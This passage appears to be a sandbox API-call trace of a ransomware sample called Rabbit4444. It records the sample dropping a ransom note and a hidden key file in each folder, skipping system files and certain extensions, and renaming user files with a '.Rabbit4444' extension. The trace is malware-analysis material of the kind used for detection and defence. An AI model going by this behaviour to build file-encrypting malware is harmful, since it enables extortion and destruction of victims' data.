FILES.txt" [0056.231] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0056.231] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0056.231] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0056.232] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.232] CloseHandle (hObject=0x278) returned 1 [0056.232] CloseHandle (hObject=0x27c) returned 1 [0056.232] GetCurrentThreadId () returned 0xd98 [0056.232] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122128 [0056.232] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings" [0056.232] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.232] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122120 | out: hHeap=0xe0000) returned 1 [0056.232] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings" [0056.232] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\" [0056.232] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\.BFC0E91B00AE8A0620D3" [0056.232] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0056.234] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0056.236] FlushFileBuffers (hFile=0x27c) returned 1 [0056.237] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0056.237] CloseHandle (hObject=0x27c) returned 1 [0056.238] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings") returned 110 [0056.238] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.238] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe5aa5c7c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xe5aa5c7c, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xead6c99f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0056.238] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.238] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0056.238] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0056.238] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0056.238] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe5aa5c7c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xe5aa5c7c, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xead6c99f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.238] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.238] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0056.239] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0056.239] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0056.239] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0056.239] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xead6c99f, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xead6c99f, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xead6c99f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0056.239] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.239] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0056.239] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe5aa5c7c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x5800ae7c, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x5800ae7c, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0056.239] lstrcmpiW (lpString1="en-US", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.239] lstrcmpiW (lpString1="en-US", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.239] lstrcmpiW (lpString1="en-US", lpString2="Rabbit4444.exe") returned -1 [0056.239] lstrcmpiW (lpString1="en-US", lpString2=".") returned 1 [0056.239] lstrcmpiW (lpString1="en-US", lpString2="..") returned 1 [0056.239] lstrcmpiW (lpString1="en-US", lpString2="windows") returned -1 [0056.239] lstrcmpiW (lpString1="en-US", lpString2="bootmgr") returned 1 [0056.239] lstrcmpiW (lpString1="en-US", lpString2="pagefile.sys") returned -1 [0056.239] lstrcmpiW (lpString1="en-US", lpString2="boot") returned 1 [0056.239] lstrcmpiW (lpString1="en-US", lpString2="ids.txt") returned -1 [0056.239] lstrcmpiW (lpString1="en-US", lpString2="NTUSER.DAT") returned -1 [0056.239] lstrcpyW (in: lpString1=0x130ec16, lpString2="en-US" | out: lpString1="en-US") returned="en-US" [0056.239] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122120 [0056.239] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xea) returned 0x120118 [0056.239] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122128 | out: ListHead=0xf68b0, ListEntry=0x122128) returned 0x1222c8 [0056.239] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe5aa5c7c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x5800ae7c, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x5800ae7c, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 0 [0056.239] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0056.239] lstrcpyW (in: lpString1=0x130ec16, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0056.239] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0056.241] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0056.241] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0056.241] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.241] CloseHandle (hObject=0x278) returned 1 [0056.241] CloseHandle (hObject=0x27c) returned 1 [0056.241] GetCurrentThreadId () returned 0xd98 [0056.241] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122128 [0056.241] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US" [0056.241] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x120118 | out: hHeap=0xe0000) returned 1 [0056.241] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122120 | out: hHeap=0xe0000) returned 1 [0056.241] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US" [0056.242] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\" [0056.242] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\.BFC0E91B00AE8A0620D3" [0056.242] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0056.246] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0056.249] FlushFileBuffers (hFile=0x27c) returned 1 [0056.250] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0056.250] CloseHandle (hObject=0x27c) returned 1 [0056.250] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US") returned 116 [0056.250] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.250] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe5aa5c7c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x5800ae7c, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0xead92b85, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0056.250] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.251] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0056.251] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0056.251] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0056.251] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe5aa5c7c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x5800ae7c, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0xead92b85, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.258] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.258] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0056.258] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0056.258] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0056.258] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0056.258] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xead92b85, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xead92b85, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xead92b85, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0056.258] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.258] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0056.258] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee409780, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xee409780, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x2216c19d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="aaa_Classic_{241d7c96-f8bf-4f85-b01f-e2b043341a4b}.settingcontent-ms", cAlternateFileName="AAA_CL~1.SET")) returned 1 [0056.258] lstrcmpiW (lpString1="aaa_Classic_{241d7c96-f8bf-4f85-b01f-e2b043341a4b}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.258] lstrcmpiW (lpString1="aaa_Classic_{241d7c96-f8bf-4f85-b01f-e2b043341a4b}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.258] lstrcmpiW (lpString1="aaa_Classic_{241d7c96-f8bf-4f85-b01f-e2b043341a4b}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.258] lstrcmpiW (lpString1="aaa_Classic_{241d7c96-f8bf-4f85-b01f-e2b043341a4b}.settingcontent-ms", lpString2=".") returned 1 [0056.258] lstrcmpiW (lpString1="aaa_Classic_{241d7c96-f8bf-4f85-b01f-e2b043341a4b}.settingcontent-ms", lpString2="..") returned 1 [0056.258] lstrcmpiW (lpString1="aaa_Classic_{241d7c96-f8bf-4f85-b01f-e2b043341a4b}.settingcontent-ms", lpString2="windows") returned -1 [0056.258] lstrcmpiW (lpString1="aaa_Classic_{241d7c96-f8bf-4f85-b01f-e2b043341a4b}.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.258] lstrcmpiW (lpString1="aaa_Classic_{241d7c96-f8bf-4f85-b01f-e2b043341a4b}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.258] lstrcmpiW (lpString1="aaa_Classic_{241d7c96-f8bf-4f85-b01f-e2b043341a4b}.settingcontent-ms", lpString2="boot") returned -1 [0056.258] lstrcmpiW (lpString1="aaa_Classic_{241d7c96-f8bf-4f85-b01f-e2b043341a4b}.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.258] lstrcmpiW (lpString1="aaa_Classic_{241d7c96-f8bf-4f85-b01f-e2b043341a4b}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.259] lstrcpyW (in: lpString1=0x130ec22, lpString2="aaa_Classic_{241d7c96-f8bf-4f85-b01f-e2b043341a4b}.settingcontent-ms" | out: lpString1="aaa_Classic_{241d7c96-f8bf-4f85-b01f-e2b043341a4b}.settingcontent-ms") returned="aaa_Classic_{241d7c96-f8bf-4f85-b01f-e2b043341a4b}.settingcontent-ms" [0056.259] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\aaa_Classic_{241d7c96-f8bf-4f85-b01f-e2b043341a4b}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.259] lstrlenW (lpString="aaa_Classic_{241d7c96-f8bf-4f85-b01f-e2b043341a4b}.settingcontent-ms") returned 68 [0056.259] lstrlenW (lpString="Rabbit4444") returned 10 [0056.259] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.259] lstrlenW (lpString=".dll") returned 4 [0056.259] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.259] lstrlenW (lpString=".lnk") returned 4 [0056.260] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.260] lstrlenW (lpString=".ini") returned 4 [0056.260] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.260] lstrlenW (lpString=".sys") returned 4 [0056.260] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.260] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\aaa_Classic_{241d7c96-f8bf-4f85-b01f-e2b043341a4b}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_classic_{241d7c96-f8bf-4f85-b01f-e2b043341a4b}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.260] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.260] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14757064920) returned 1 [0056.260] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=861) returned 1 [0056.260] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0056.260] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0056.260] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x660, lpName=0x0) returned 0x298 [0056.261] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x660) returned 0x70000 [0056.262] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.262] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0056.262] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.262] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0056.262] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.262] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0056.262] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.262] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0056.262] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14757301818) returned 1 [0056.262] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0056.262] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0056.262] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.262] CloseHandle (hObject=0x298) returned 1 [0056.263] CloseHandle (hObject=0x278) returned 1 [0056.263] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\aaa_Classic_{241d7c96-f8bf-4f85-b01f-e2b043341a4b}.settingcontent-ms.Rabbit4444") returned 196 [0056.263] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\aaa_Classic_{241d7c96-f8bf-4f85-b01f-e2b043341a4b}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_classic_{241d7c96-f8bf-4f85-b01f-e2b043341a4b}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\aaa_Classic_{241d7c96-f8bf-4f85-b01f-e2b043341a4b}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_classic_{241d7c96-f8bf-4f85-b01f-e2b043341a4b}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.263] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee4c848e, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xee4c848e, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x2315dd0d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3f3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="aaa_Classic_{728047C0-00D2-4FDB-A069-06338B92E93B}.settingcontent-ms", cAlternateFileName="AAA_CL~2.SET")) returned 1 [0056.263] lstrcmpiW (lpString1="aaa_Classic_{728047C0-00D2-4FDB-A069-06338B92E93B}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.263] lstrcmpiW (lpString1="aaa_Classic_{728047C0-00D2-4FDB-A069-06338B92E93B}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 